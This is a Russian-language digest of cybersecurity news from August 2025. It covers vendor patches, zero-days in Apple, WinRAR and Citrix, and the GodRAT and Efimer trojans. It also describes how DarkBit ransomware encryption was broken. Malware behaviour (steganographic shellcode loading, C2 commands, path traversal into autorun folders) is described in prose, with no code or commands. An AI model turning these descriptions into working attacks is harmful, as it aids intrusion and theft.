Apple выпустила экстренные обновления для исправления еще одной 0-day (помимо еще пяти, эксплуатируемых в сети с начала года), которая была использована в проведении чрезвычайно сложной атаки.

Она отслеживается как CVE-2025-43300 и связана с записью за пределами выделенного буфера памяти.

Была обнаружена исследователями Apple в инфраструктуре Image I/O, которая позволяет приложениям читать и записывать большинство форматов файлов изображений.

Как отмечает Apple, компания получила отчете о том, что эта уязвимость могла быть использована для крайне сложной таргетированной атаке в отношении конкретных неназванных лиц.

Проблема записи за пределами выделенного буфера памяти решена благодаря улучшенной проверке границ.

Обработка вредоносного файла изображения может привести к повреждению памяти.

Apple решила эту проблему, улучшив проверку границ для предотвращения эксплуатации уязвимости в iOS 18.6.2 и iPadOS 18.6.2, iPadOS 17.7.10, macOS Sequoia 15.6.1, macOS Sonoma 14.7.8 и macOS Ventura 13.7.8.

Полный перечень устройств, затронутых уязвимостью, достаточно обширен, ошибка затрагивает как старые, так и новые модели, включая: iPhone XS, iPad Pro 13 дюймов, iPad Pro 12,9 дюймов 3-го поколения, iPad Pro 11 дюймов 1-го поколения, iPad Air 3-го поколения, iPad 7-го поколения, iPad mini 5-го поколения, iPad Pro 12,9 дюймов 2-го поколения, iPad Pro 10,5 дюймов и iPad 6-го поколения и Mac под управлением macOS Sequoia, Sonoma и Ventura.

Компания традиционно пока не раскрывает авторства открытия и не публикует подробности об атаках.

Несмотря на то, что они были нацелены на конкретные цели, пользователям настоятельно рекомендуется как можно скорее обновиться, чтобы нейтрализовать потенциальные риски.

Власти Великобритании после долгих инсинуаций отказались от требований к Apple по ослаблению шифрования и реализации бэкдора для доступа к зашифрованным облачным данным.

Сделать это пришлось под давлением правительства США, крайне негативно отреагировавшем на возможный доступ к защищенным данным своих граждан.

Директор Национальной разведки США (DNI) Тулси Габбард в своем заявлении отметила, что в течение последних нескольких месяцев правительство США тесно работало с партнерами из Великобритании, отстаивая гражданские свободы американцев.

Тем не менее, в начале февраля Apple была вынуждена отключить опцию Advanced Data Protection (ADP) для iCloud в Великобритании в ответ на запрос местного правительства предоставить доступ к зашифрованным пользовательским данным.

Секретное распоряжение, обязывающее Apple внедрить бэкдор, было оформлено в форме уведомления о технических возможностях (TCN) Министерства внутренних дел Великобритании в соответствии с Законом о полномочиях следствия (IPA) для обеспечения неограниченного доступа к сквозному шифрованию облачных данных, даже для пользователей за пределами страны.

Распоряжение было вынесено в январе 2025 года и вызвало резкую критику со стороны представителей инфосек-сообщества, сетовавших на то, что подобные лазейки могут просочиться в киберподполье или попасть в руки разработчикав spyware со всеми вытекающими.

После чего Apple подала апелляцию с требованиями проверки законности постановления, а Трибунал по расследованию полномочий (IPT) отклонил попытки МВД сохранить разбирательство в тайне.

В дело также вмешались американские сенаторы, а американская разведка вовсе пригрозила сворачиванием каналов взаимодействия по линии спецслужб. В итоге пришлось британским спецслужбам дать заднюю.

Но самое интересное, что кроме Apple никаких требований доступа к данным клиентов в глаза не видели ни в Google, сообщившая об этом в конце прошлого месяца, ни в Meta (признана в РФ экстремистской).

Во всяком случае - так говорят официально, но как знать.

Исследователи Лаборатории Касперского сообщают о новой кампании, нацеленной на финансовый сектор с использованием ранее неизвестного трояна удаленного доступа GodRAT.

Вредоносная активность реализуется посредством распространения вредоносных файлов .SCR, замаскированных под финансовые документы через Skype.

Атаки активизировались 12 августа и задействуют технологию стеганографии для сокрытия в файлах изображений шелл-кода, используемого для загрузки вредоносного ПО с C2.

Причем артефакты прослеживаются с 9 сентября 2024 года и затрагивают Гонконг, ОАЭ, Ливан, Малайзию и Иорданию.

GodRAT, по всей видимости, основанный на Gh0st RAT, реализует плагины для расширения своей функциональности, позволяя собирать конфиденциальную информацию и доставлять вторичные полезные данные, такие как AsyncRAT.

Исходный код Gh0st RAT был опубликован еще в 2008 году и с тех пор использовался различными китайскими хакерскими группами.

Лаборатория Касперского полагает, что вредоносная ПО представляет собой эволюцию другого бэкдора на базе Gh0st RAT, известного как AwesomePuppet, который был впервые задокументирован в 2023 и, вероятно, связан с Winnti (APT41).

SCR-файлы представляют собой самораспаковывающийся исполняемый файл, содержащий различные встроенные файлы, включая вредоносную DLL, загружаемую легитимным исполняемым файлом.

DLL-библиотека извлекает шелл-код, скрытый в файле изображения JPG, который затем открывает путь для развертывания GodRAT.

Троян, в свою очередь, устанавливает соединение с C2 по протоколу TCP, собирает информацию о системе и извлекает список установленных на хосте антивирусов.

Полученные данные отправляются на сервер C2, после чего тот отвечает дальнейшими инструкциями, позволяющими внедрить полученный плагин DLL в память, завершить процесс RAT, загрузить файл по указанному URL-адресу и запустите его с помощью API CreateProcessA, а также отрыть URL-адрес с помощью команды оболочки в Internet Explorer.

Один из плагинов представляет собой DLL-библиотеку FileManager, которая может выполнять операции с файлами, открывать папки и даже искать файлы в указанном месте.

Плагин также использовался для доставки дополнительных вредоносных ПО, в том числе для кражи паролей для браузеров Google Chrome и Microsoft Edge, а также троян AsyncRAT.

Исследователи обнаружили полный исходный код клиента и сборщика GodRAT, который был загружен в VirusTotal в конце июля 2024 года. Сборщик может использоваться для создания как исполняемого файла, так и DLL-библиотеки.

При выборе варианта исполнения пользователи могут выбрать легитимный двоичный файл из списка, в который внедряется вредоносный код: svchost.exe, cmd.exe, cscript.exe, curl.exe, wscript.exe, QQMusic.exe и QQScLauncher.exe. Конечный файл может сохраняться в exe, com, bat, scr и pif.

Как отмечают исследователи, старые импланты долгое время использовались различными злоумышленниками, и обнаружение GodRAT демонстрирует, что устаревшие кодовые базы, такие как Gh0st RAT, могут по-прежнему долго существовать на ландшафте угроз.

Elastic официально опровергла сообщение в отношении 0-day в ее системе Defend Endpoint Detection and Response (EDR).

Заявление компании последовало в ответ на публикацию в блоге компании AshES Cybersecurity, в которой утверждается, что в Elastic Defend обнаружена уязвимость удаленного выполнения кода (RCE), позволяющая злоумышленнику обойти защиту EDR.

Как сообщается, команда Elastic Security Engineering «провела тщательное расследование», но не смогла найти «доказательств, подтверждающих заявления об уязвимости, которая обходит мониторинг EDR и позволяет удаленно выполнять код».

Согласно отчету AshES Cybersecurity от 16 августа, уязвимость разыменования указателя NULL в драйвере ядра Elastic Defender (elastic-endpoint-driver.sys) может быть использована для обхода мониторинга EDR, обеспечения RCE с ограниченной видимостью и обеспечения персистентности в системе.

Причем для демонстрации концепции исследователь AshES Cybersecurity использовал специальный драйвер, чтобы достоверно активировать уязвимость в контролируемых условиях.

Чтобы продемонстрировать обоснованность выводов, компания опубликовала даже два видеоролика: один из них демонстрирует сбой Windows из-за сбоя драйвера Elastic, а другой демонстрирует предполагаемый эксплойт, запускающий calc.exe без принятия мер Defend EDR от Elastic.

Исследователи отметили, что 0-day драйвера Elastic - это не просто ошибка стабильности. Она позволяет реализовать целую цепочку атак, которую злоумышленники могут использовать в реальных средах.

В свою очередь, после оценки заявлений и отчетов AshES Cybersecurity специалисты Elastic не смогли воспроизвести уязвимость и ее последствия.

Кроме того, Elastic утверждает, что в многочисленных отчетах, полученных от AshES Cybersecurity о предполагаемой уязвимости нулевого дня, «отсутствуют доказательства воспроизводимых эксплойтов», а сами исследователи якобы отказались предоставить воспроизводимый PoC.

AshES Cybersecurity подтвердила свое решение не отправлять PoC компании Elastic или ее представителям, на что последняя назвала их действия «противоречащими принципам координированного раскрытия информации».

По всей видимости, возникли разногласия по поводу выплат в рамках программы вознаграждения, по которой в принципе начиная с 2017 года Elastic произвела платежи на сумму в размере 600 000 долл.

Как бы то ни было, уверены, что в киберподполье проведут собственный инжиниринг и рассудят стороны своими методами.

Но будем посмотреть, конечно.

Google и Mozilla представили серию исправлений для Chrome и Firefox, в том числе для уязвимостей высокой степени серьезности.

Выпущена новая версия Chrome 139 с устранением серьезной проблемы записи за пределами выделенной памяти в движке JavaScript V8, которая отслеживается как CVE-2025-9132.

Уязвимость могла эксплуатироваться удаленно с помощью специально созданных HTML-страниц. Ее обнаружил агент Google Big Sleep AI, запущенный Google DeepMind и Project Zero в ноябре 2024 года.

Google не раскрыла подробностей об уязвимости CVE-2025-9132, но в прошлом месяце отмечала, что Big Sleep способен находить уязвимости, о которых злоумышленники уже знают и планируют использовать в своих атаках, что позволяет отрасли препятствовать их эксплуатации.

Исправления уязвимости V8 были включены в версии Chrome 139.0.7258.138/.139 для Windows и macOS, а также в версию 139.0.7258.138 для Linux, которые вскоре должны стать доступны всем пользователям.

Mozilla выпустила исправления для девяти уязвимостей безопасности Firefox, пять из которых были оценены как высокосерьёзные.

Также были выпущены новые версии Thunderbird и Firefox ESR для устранения некоторых из этих ошибок.

К уязвимостям высокой степени серьезности относятся проблема повреждения памяти в процессе GMP, приводящая к выходу из «песочницы» (CVE-2025-9179), обход политики единого источника в графическом компоненте (CVE-2025-9180) и несколько ошибок безопасности памяти, которые потенциально могут привести к RCE (CVE-2025-9187, CVE-2025-9184 и CVE-2025-9185).

Оставшиеся недостатки, исправленные в этой версии Firefox, включают в себя проблему неинициализированной памяти средней степени серьезности, а также ошибки спуфинга и DoS низкой степени.

Исправления этих уязвимостей безопасности были включены в Firefox 142, Thunderbird 142, Thunderbird 140.2, Thunderbird 128.14, Firefox для iOS 142, Focus для iOS 142, Firefox ESR 140.2, Firefox ESR 128.14 и Firefox ESR 115.27.

Google и Mozilla не упоминают об использовании каких-либо из этих уязвимостей в атаках, но пользователям рекомендуется как можно скорее обновить свои браузеры и почтовые клиенты.

Исследователи Лаборатории Касперского представили результаты нового аналитического исследования из серии отчетов в отношении актуальных трендов в фишинге и скаме.

С момента предыдущей публикации по приемам фишеров произошел значительный рывок в развитии подобного рода угроз.

Несмотря на то, что многие ранее описанные инструменты по-прежнему остаются актуальными, появились новые техники, изменились цели атак и способы их реализации.

Фишинг и скам - это достаточно динамичные виды онлайн-мошенничества, они стремительно эволюционируют благодаря ИИ и новым технологиям.

Злоумышленники на системной основе изобретают как новые, более сложные схемы, так и улучшают старые, адаптируя их под новостную повестку, тренды и громкие мировые события.

Если раньше мошенники ограничивались поддельными письмами и сайтами, то сегодня они используют дипфейки, голосовые клоны, крадут биометрию и выманивают данные пользователей в несколько этапов.

В своем отчете исследователи выделяют следующие главные тенденции:

- Персонализация атак: ИИ анализирует соцсети и корпоративные данные, делая фишинг максимально правдоподобным.

- Использование легитимных сервисов: злоумышленники эксплуатируют доверенные платформы, такие как Google Translate и Telegraph.

- Кража неизменяемых данных: биометрия, подписи и голос становятся желанными целями.

- Усложнение обхода 2FA: мошенники внедряют многоэтапные схемы социнженерии.

Влияние ИИ на фишинг и скам, последние изменения в инструментарии злоумышленников, роль мессенджеров и приоритеты мошенников - все это в отчете.

Fortinet рапортует об устранении серьёзной уязвимости (CVE-2025-52970), получившей название FortMajeure в своих межсетевых экранах FortiWeb, которая позволяет злоумышленникам подделывать сеансовые cookie-файлы и обходить аутентификацию на устройстве.

И настоятельно рекомендует клиентам установить исправление для своих устройств FortiSIEM для нейтрализации потенциальных рисков атак с внедрением команд (CVE-2025-25256), поскольку реально работающий код эксплойта доступен в сети и ожидается его скорейшая реализация в дикой природе.

Тем не менее, в сети активно расползаются слухи о продаже в киберподпольщиками некой 0-day Fortinet для RCE, затрагивающей об устранении северсий 7.4–7.6 (имеется якобы даже работающий PoC).

Но будем посмотреть.

Cisco опубликовала более 20 рекомендаций по безопасности в рамках обноавлений за август 2025 года для продуктов Secure Firewall Management Center (FMC), Secure Firewall Threat Defense (FTD) и Secure Firewall Adaptive Security Appliance (ASA).

Наиболее серьезной уязвимостью является CVE-2025-20265 (оценка CVSS: 10,0) критическая уязвимость, затрагивающая платформу Secure FMC, предназначенную для управления и мониторинга устройств Cisco FTD и других решений безопасности.

Уязвимость затрагивает реализацию подсистемы RADIUS, что может позволить неаутентифицированному удаленному злоумышленнику внедрять произвольные команды оболочки, которые выполняются устройством.

Проблема возникает из-за отсутствия надлежащей обработки вводимых пользователем данных на этапе аутентификации, в результате чего злоумышленник может отправить специально созданные входные данные при вводе учетных данных, которые проходят аутентификацию на настроенном сервере RADIUS.

Успешный эксплойт может позволить злоумышленнику выполнять команды с высоким уровнем привилегий.

Для эксплуатации Secure FMC должен быть настроен на аутентификацию RADIUS для веб-интерфейса управления, управления SSH или обоих.

Уязвимость затрагивает версии Secure FMC Software 7.0.7 и 7.7.0, если в них включена аутентификация RADIUS.

Обходных путей, кроме применения исправлений, предоставляемых компанией, не существует.

Помимо CVE-2025-20265 Cisco также исправила ряд других серьезных ошибок:

- CVE-2025-20217 (CVSS: 8,6): DoS-уязвимость Snort 3 в Secure Firewall Threat Defense.

- CVE-2025-20222 (CVSS: 8,6): DoS-уязвимость IPv6 через IPsec в Secure Firewall и Secure Firewall для Firepower серии 2100.

- CVE-2025-20224, CVE-2025-20225, CVE-2025-20239 (оценка CVSS: 8,6): DoS-уязвимости IKEv2 в IOS, IOS XE, Secure Firewall Adaptive Security Appliance и Secure Firewall Threat Defense Software.

- CVE-2025-20133, CVE-2025-20243 (CVSS: 8,6): DoS-уязвимость удаленного доступа SSL VPN для Secure Firewall и Secure Firewall.

- CVE-2025-20134 (CVSS: 8,6): DoS-уязвимость SSL/TLS-сертификата в Secure Firewall и Secure Firewall Threat Defense.

- CVE-2025-20136 (CVSS: 8,6): DoS-уязвимость при проверке DNS в системе преобразования сетевых адресов Secure Firewall Adaptive Security Appliance и Secure Firewall Threat Defense.

- CVE-2025-20263 (CVSS: 8,6): уязвимость отказоустойчивости веб-сервисов Secure Firewall Adaptive Security Appliance и Secure Firewall Threat Defense Software.

- CVE-2025-20148 (CVSS: 8,5): уязвимость HTML-инъекции в Secure Firewall Management Center.

- CVE-2025-20251 (CVSS: 8,5): DoS-уязвимость VPN-сервера VPN в Secure Firewall и Secure Firewall Threat Defense.

- CVE-2025-20127 (CVSS: 7,7): уязвимость шифрования TLS 1.3 типа DoS в Secure Firewall и Secure Firewall для Firepower серий 3100 и 4200.

- CVE-2025-20244 (CVSS: 7,7): DoS-уязвимость веб-сервера VPN с удалённым доступом в Secure Firewall Adaptive Security Appliance и Secure Firewall Threat Defense.

Как отмечает поставщик, пока ни одна из проблем не подвергалась активной эксплуатации в реальных условиях, но учитывая особое отношение киберподполья к решениям компании - это определенно может произойти.

Исследователи из Лаборатории Касперского расчехлили новый троян Efimer, нацеленный на кражу криптовалюты и обладающий возможностями массового распространения через взлом WordPress-сайтов и размещаемые на них вредоносные файлы.

Изначально задетектить новую угрозу удалось в ходе исследования массовую рассылки от имени юристов крупной компании с претензиями о якобы использовании получателем доменного имени в нарушение прав отправителя.

В прикрепленном к письму архиве Demand_984175.zip получатель может обнаружить еще один архив, защищенный паролем, и пустой файл с именем PASSWORD - 47692.

В запароленном архиве располагался вредоносный файл Requirement.wsf, и, в случае его запуска, компьютер заражался троянцем Efimer, а на экране выходило сообщение об ошибке.

Efimer представляет собой троянец типа ClipBanker с функцией подмены адресов криптокошельков в буфере обмена на адреса кошельков злоумышленника, а также с возможностью выполнять сторонний код, полученный от командного центра.

После заражения запускается процесс установки на компьютер жертвы прокси-клиента Tor для дальнейшего взаимодействия с C2.

Троян получил такое имя, поскольку в начале расшифрованного скрипта присутствовал комментарий со словом Efimer.

Первые версии этого троянца появились, предположительно, в октябре 2024 года.

По состоянию на июль 2025 года с троянцем Efimer столкнулись 5015 пользователей решений Лаборатории Касперского.

Зловред был наиболее активен в Бразилии (1476 жертв). Также в числе наиболее пострадавших оказались пользователи Индии, Испании, России, Италии и Германии.

Основными каналами распространения Efimer выступают взломанные WordPress-сайты, вредоносные торренты и электронная почта.

Дополнительные скрипты под капотом расширяет функциональность трояна, позволяя злоумышленникам взламывать сайты WordPress и рассылать спам, обеспечивая полноценную вредоносную инфраструктуру, в том числе для распространения на новые устройства.

Еще одна любопытная особенность этого троянца состоит в том, что он пытается распространяться как среди частных пользователей, так и в корпоративной среде.

В первом случае злоумышленники используют в качестве приманки торрент-файлы якобы для загрузки популярных фильмов, в другом - претензии, связанные с якобы неправомерным использованием слов или фраз, зарегистрированных другой компанией.

При этом стоит отметить, что в обоих случаях заражение невозможно, если пользователь сам не скачает и не запустит вредоносный файл.

Технические подробности и разбор Efimer - в отчете.

Подкатил PatchTuesday в категории ICS и OT за август 2025 года от основных поставщиков, включая Siemens, Schneider, Aveva, Honeywell, ABB и Phoenix Contact.

Siemens опубликовала 22 новых бюллетеня, один из которых описывает CVE-2025-40746 - критическую уязвимость в Simatic RTLS Locating Manager, которую может использовать аутентифицированный злоумышленник для выполнения кода с системными привилегиями. 

Компания также опубликовала рекомендации, касающиеся уязвимостей высокой степени серьезности в Comos (RCE), Siemens Engineering Platforms (RCE), Simcenter (DoS или RCE), контроллерах Sinumerik (несанкционированный удаленный доступ), Ruggedcom (обход аутентификации с физическим доступом), Simatic (RCE), Siprotect (DoS) и Opcenter Quality (несанкционированный доступ).

Siemens также устранила уязвимости, связанные со сторонними компонентами, включая OpenSSL, ядро Linux, Wibu Systems, Nginx, Nozomi Networks и SQLite.

Устранены проблемы средней и низкой степени серьезности в Simotion Scout, Siprotec 5, Simatic RTLS Locating Manager, Ruggedcom ROX II и Sicam Q.

Schneider Electric выпустила пять новых бюллетеней. В одном из них описаны четыре высокосерьезные уязвимости в EcoStruxure Power Monitoring Expert, Power Operation и Power SCADA Operation. Эксплуатация может привести к RCE или раскрытию конфиденциальных данных.

В контроллере Modicon M340 и его коммуникационных модулях устранена опасная DoS-уязвимость, которая может быть вызвана специально созданными FTP-командами, а также проблема высокой степени серьезности, приводящая к раскрытию конфиденциальной информации или DoS. 

В инструменте Schneider Electric Software Update компания устранила уязвимость высокой степени серьезности, которая позволяла злоумышленнику повысить привилегии, повредить файлы, получить информацию или вызвать DoS. 

В Saitel и EcoStruxure были исправлены проблемы средней степени серьезности, которые могли привести к EoP, DoS или раскрытию конфиденциальных учетных данных. 

Honeywell опубликовала шесть бюллетеней, посвящённых продуктам SCADA, в том числе несколько бюллетеней, информирующих об обновлениях Windows для продуктов Maxpro и Pro-Watch NVR и VMS.

Компания также выпустила бюллетени, посвящённые обновлениям и улучшениям безопасности для контроллеров доступа серии PW.

Aveva выкатила уведомление о двух проблемах в PI Integrator for Business Analytics. Были устранены две уязвимости: одна - с произвольной загрузкой файлов, которая могла привести к RCE, и другая - приводящяя к раскрытию конфиденциальных данных.

ABB сообщала о нескольких уязвимостях, затрагивающих Aspect, Nexus и Matrix.

Некоторые из них могут быть использованы без аутентификации для RCE, получения учётных данных, а также для манипулирования файлами и различными компонентами.

Phoenix Contact предупредила клиентов об уязвимости, связанной с EoP в системе управления устройствами и обновлениями.

Rockwell Automation анонсирвоала предупреждение для клиентов в отношении нескольких серьезных уязвимостей выполнения кода, влияющих на Arena Simulation.

Также предупреждение выпустила Mitsubishi Electric, описывая в нем уязвимость, приводящую к подмене информации в продуктах Genesis и MC Works64.

В кейсе XSS-форума обновления.

Команда модераторов недавно захваченного силовиками хакерского форума XSS пытается вернуться под брендом DamageLib.

Как утверждается, у XSS теперь новый администратор и адрес.

При этом исходный сайт всё ещё продолжает работать под патронажем старого админа, и вся инфраструктура и сервисы были перенесены и восстановлены.

Модераторы же заявляют, что сайт был скомпрометирован. Они создали новый из дампа, но база данных пользователей не была восстановлена, и депозиты не были переведены.

Исследователям Profero удалось взломать шифрование DarkBit ransomware, что позволило по итогу восстановить файлы жертвы без уплаты выкупа.

Это произошло еще в 2023 году в рамках реагирования на инцидент и расследования атаки в отношении одного из их клиентов, в чьей инфраструктуре банда зашифровала несколько серверов VMware ESXi.

Хронология кибератаки позволяет предположить, что она стала ответом на удары беспилотников в Иране, совершенные в 2023 году по предприятиям Министерства обороны Ирана.

Тогда хакеры DarkBit выкатывали требования о выкупе в 80 биткоинов, атакуя уякбные заведения в Израиле, а национальное киберкомандование связало атаки DarkBit с иранской государственной хакерской APT MuddyWater.

В случае, которым занимались исследователи, злоумышленники вовсе не вели переговоров о выкупе, а, по всей видимости, были больше заинтересованы в нанесении максимального ущерба работе систем.

На момент атаки дешифратора для DarkBit не было, поэтому Profero решила анализировать вредоносное ПО на предмет потенциальных уязвимостей.

DarkBit использует уникальный ключ AES-128-CBC и вектор инициализации (IV), генерируемые во время выполнения для каждого файла, шифруются с помощью RSA-2048 и добавляются к заблокированному файлу.

Ресерчеры смогли понять, что метод генерации ключей DarkBit отличается низкой энтропией. В сочетании с временной меткой шифрования, которую можно определить по времени изменения файла, общее пространство ключей сокращается до нескольких миллиардов вариантов.

Более того, они обнаружили, что файлы VMDK на серверах ESXi имеют известные байты заголовка, поэтому им пришлось перебирать только первые 16 байтов, чтобы проверить, совпадает ли заголовок, а не весь файл.

Profero разработала инструмент для проверки всех возможных начальных значений, генерации пар потенциальных ключей и векторов расшифровки (IV) и проверки по заголовкам VMDK. Запустив его в высокопроизводительной вычислительной среде удалось восстановить действительные ключи дешифрования.

Параллельно с этим исследователи обнаружили, что большая часть содержимого файлов VMDK не была затронута прерывистым шифрованием DarkBit, поскольку многие зашифрованные фрагменты попадали в пустое пространство.

Это позволило им извлечь значительные объемы ценных данных без необходимости расшифровывать их методом подбора ключей.

Файлы VMDK в основном пусты, и, следовательно, фрагменты, зашифрованные программой-вымогателем в каждом файле, также в основном пусты.

По статистике, большинство файлов, содержащихся в файловых системах VMDK, не будут зашифрованы, и большинство файлов внутри этих файловых систем в любом случае не имеют отношения к расследованию.

И так им удалось пройтись по файловой системе и извлечь то, что осталось от внутренних файловых систем VMDK. Большинство нужных файлов можно было просто восстановить без расшифровки.

Несмотря на то, что Profero так и не выпустили дешифратор DarkBit публично, они готовы оказать содействие будущим жертвам.

Правда, это не гарантирует того, что в новых атаках не будут учтены допущенные ошибки. Скорее всего, уже. Но будем посмотреть.

Подкатили ежемесячные обновления от Microsoft в рамках PatchTuesday за август 2025 года с исправлениями для 107 уязвимостей, включая одну публично раскрытую 0-day в Windows Kerberos.

В целом, исправлены 13 критических уязвимостей, 9 из которых это RCE, 3 - раскрытия информации и 1 - повышения привилегий.

При этом большинство из критических на самом деле имеют высокий уровень серьёзности согласно рейтингу CVSS, за исключением CVE-2025-53766 - уязвимости RCE в компоненте Windows GDI+, имеющей рейтинг CVSS 9,8.

По данным инициативы ZDI Trend Micro, уязвимость CVE-2025-53766 может эксплуатироваться, если заставить целевого пользователя посетить вредоносный сайт или открыть вредоносный документ.

Другая уязвимость из категории критических, - CVE-2025-50165, затрагивает графический компонент Windows и допускает RCE.

Для её эксплуатации пользователю необходимо просмотреть специально созданное изображение. Microsoft присвоила ей уровень серьёзности «важный».

Другие уязвимости, реализующие RCE, - это CVE-2025-53740 и CVE-2025-53731, влияют на Office и могут быть использованы через панель предварительного просмотра.

Ещё одна уязвимость, на которую стоит обратить внимание, - CVE-2025-49712, RCE-уязвимость, влияющая на SharePoint. ZDI отметил, что она похожа на уязвимость, которая недавно эксплуатировалась в рамках цепочки эксплойтов ToolShell.

Среди уязвимостей, отмеченных корпорацией Microsoft как критические, также включает несколько проблем Hyper-V (раскрытие информации, подмена и RCE), а также ошибку раскрытия информации в Azure Stack Hub.

Общее распределение всех проблем выглядит следующим образом: 44 - EoP, 35 - RCE, 18 - раскрытие информации, 4 - DoS, 9 - спуфинг.

Как упоминалось, представленный PatchTuesday закрывает (на этот раз всего лишь) одну публично раскрытую 0-day в Microsoft SQL Server, которая отслеживается как CVE-2025-53779 и позволяет аутентифицированному злоумышленнику получить права администратора домена.

Microsoft утверждает, что для ее эксплуатации злоумышленнику потребуется иметь расширенный доступ к следующим атрибутам dMSA: msds-groupMSAMembership (атрибут обеспечивает использование dMSA) и msds-ManagedAccountPrecededByLink (позволяет указать пользователя, от имени которого может действовать dMSA).

Microsoft приписывает обнаружение этой уязвимости Ювалю Гордону из Akamai, который, в свою очередь, также выкатил свой технический отчет еще в мае.

Полное описание каждой уязвимости и затрагиваемых систем - здесь.

Исследователи GreyNoise предупреждает о значительном всплеске целенаправленных атак 3 августа 2025 года, нацеленных на устройства Fortinet SSL VPN с использованием более 780 уникальных IP-адресов.

Только за последние 24 часа было обнаружено 56 уникальных IP-адресов.

Все они были классифицированы как вредоносные и относились к США, Канаде, России и Нидерландам, при этом цели атак располагались в США, Гонконге, Бразилии, Испании и Японии.

Компания идентифицировала две отдельные волны атак, замеченные до и после 5 августа.

Одна из них представляла собой продолжительную активность методом подбора, привязанную к одной TCP-сигнатуре, которая оставалась относительно стабильной в течение долгого времени, и вторая - внезапный и концентрированный всплеск трафика с другой TCP-сигнатурой.

При этом трафик 3 августа был направлен на FortiOS, а трафик, маркированный TCP и клиентскими подписями (метасигнатурой), с 5 августа уже не затрагивал FortiOS - был направлен на FortiManager.

Вдобавок ко всему, более глубокий анализ ретроспективных данных, связанных с отпечатком TCP после 5 августа, выявил более ранний кластер активности в июне с уникальной клиентской подписью, которая привела к устройству FortiGate в сегменте домашнего Интернет-провайдера, управляемом Pilot Fiber Inc.

Что указывает на возможное тестирование инструментария для брутфорса изначально из домашней сети, а в качестве альтернативной гипотезы - использование домашнего прокси-сервера.

Другой всплеск активности наблюдали исследователи Palo Alto Networks, в поле зрения которых попали попытки эксплуатации CVE-2025-32433 (CVSS: 10,0) в реализации SSH на базе Erlang/Open Telecom Platform (OTP), большая часть которых приходилась на OT (до 70%).

Ошибка связана с отсутствием аутентификации, что может быть использовано злоумышленником, имеющим сетевой доступ к SSH-серверу Erlang/OTP, для RCE.

Она была исправлена в апреле 2025 с помощью обновлений OTP-27.3.3, OTP-26.2.5.11 и OTP-25.3.2.20.

Анализ телеметрии показал, что более 85% попыток эксплойтов были направлены, в первую очередь, на сферы здравоохранения, сельского хозяйства, СМИ и развлечений, а также высоких технологий в США, Канаде, Бразилии, Индии и Австралии.

Palo Alto выявила несколько вредоносных полезных нагрузок, которые злоумышленники пытались внедрить посредством эксплуатации уязвимости CVE-2025-32433, включая обратные оболочки, обеспечивающие несанкционированный удаленный доступ.

В некоторых случаях исследователи заметили использование удаленного хоста с портом, обычно связанным с серверами для управления ботнетами.

Реализованное силами Palo Alto сканирование указывает, что еще что сотни сервисов Erlang/OTP, присутствующих в промышленных сетях, подвержены атакам и остаются уязвимыми.

Как оказывается, в кейсе с Citrix NetScaler в течение последних двух лет реализуются две волны классических атак на цепочку мудаков, а возможно даже уже три.

Более 3300 устройств Citrix NetScaler остаются без исправлений критической уязвимости, которая позволяет злоумышленникам обходить аутентификацию путем перехвата сеансов пользователей, даже после вышедших два месяца исправлений.

Ошибка чтения за пределами выделенной памяти, известная как CVE-2025-5777 и именуемая как CitrixBleed 2, обусловлена недостаточной проверкой входных данных, что позволяет неавторизированным злоумышленникам получать удаленный доступ к ограниченным областям памяти на устройствах, настроенных как шлюз (виртуальный сервер VPN, прокси-сервер ICA, CVPN, прокси-сервер RDP) или виртуальный сервер AAA.

Успешная эксплуатация этой уязвимости позволяет злоумышленникам красть токены сеансов, учетные данные и другие конфиденциальные данные из общедоступных шлюзов и виртуальных серверов, перехватывая сеансы пользователей и обходя таким образом MFA.

PoC-эксплойты, нацеленные на CVE-2025-5777, были выпущены уже через две недели после обнаружения уязвимости, а пользователей при этом предупредили об использовании ее в качестве нуля за несколько недель до выпуска этих эксплойтов.

Еще ранее аналогичная уязвимость Citrix, известная как CitrixBleed, также использовалась два года назад для массовых взломов устройств NetScaler, в том числе бандами вымогателей.

Но невзирая на столь печальную статистику, специалисты Shadowserver Foundation констатировали наличие 3312 устройств Citrix NetScaler, по-прежнему, уязвимых для CVE-2025-5777.

Более того, Shadowserver также обнаружила 4142 устройства, оставшихся без исправления для другой свежей критической уязвимости CVE-2025-6543, которая активно задействуется для проведения DoS и RCE атак.

Разработчики WinRAR в новой версии 7.13 исправили активно эксплуатируемую 0-day, которая отслеживается как CVE-2025-8088 и представляет собой обход пути, позволяющий злоумышленникам контролировать параметры извлечения файлов.

При извлечении файла предыдущие версии WinRAR, RAR для Windows, UnRAR, переносимый исходный код UnRAR и UnRAR.dll могли использовать путь, определенный в специально созданном архиве, вместо указанного пользователем пути.

При этом Unix-версии RAR, UnRAR, переносимый исходный код UnRAR и UnRAR.dll, а также RAR для Android не подвержены этой уязвимости.

В общем, используя эту уязвимость, злоумышленники могут создавать архивы, которые извлекают исполняемые файлы в пути автозапуска.

При последующем входе в систему исполняемый файл запустится автоматически, что позволит злоумышленнику удаленно выполнить код.

Поскольку WinRAR не имеет функции автоматического обновления, всем пользователям настоятельно рекомендуется вручную загрузить и установить последнюю версию с win-rar.com.

Ошибку обнаружили исследователи ESET, которые также полагают о ее задействовании в фишинговых атаках для установки вредоносного ПО, предположительно, связанного с хакерской группой Rocom.

Так или иначе пока это только предположение и соответствующий отчет по этому поводу ESET обещает выпустить совсем скоро.

А в российском инфосеке эксплуатацию 0-day связывают с атаками APT Paper Werewolf, aka Goffee.

В июле команда BI.ZONE зафиксировала серию целевых атак на российские организации со стороны GOFFEE.

Одной из целей стал российский производитель спецоборудования.

Атакующие отправили письмо от имени крупного НИИ, причем воспользовались для этого скомпрометированным почтовым адресом другой реально существующей компании - производителя мебели.

В приложенном к письму RAR‑архиве были «документы из министерства», а также исполняемый файл XPS Viewer.

Это легитимная ПО, но атакующие модифицировали ее исполняемый файл, добавив внутрь вредоносный код.

Он давал им возможность удаленно выполнять команды и управлять скомпрометированным устройством.

В рамках этой атаки злоумышленники эксплуатировали уже известную уязвимость CVE-2025-6218 в WinRAR до 7.11 включительно.

В более поздних атаках, нацеленных на компании из России и Узбекистана, злоумышленники нацелились на новую, не описанную на тот момент 0-day, затрагивающую версии WinRAR до 7.12 включительно.

К фишинговым письмам прилагался архив, замаскированный под документ от одного из государственных ведомств.

Вложение содержало вредоносный файл, использующий уязвимость типа directory traversal для записи файлов за пределами целевой директории.

Примечательно, что незадолго до этих атак на одном из даркнет форумов фигурировало объявление о продаже якобы рабочего эксплоита, предположительно, для этой уязвимости.

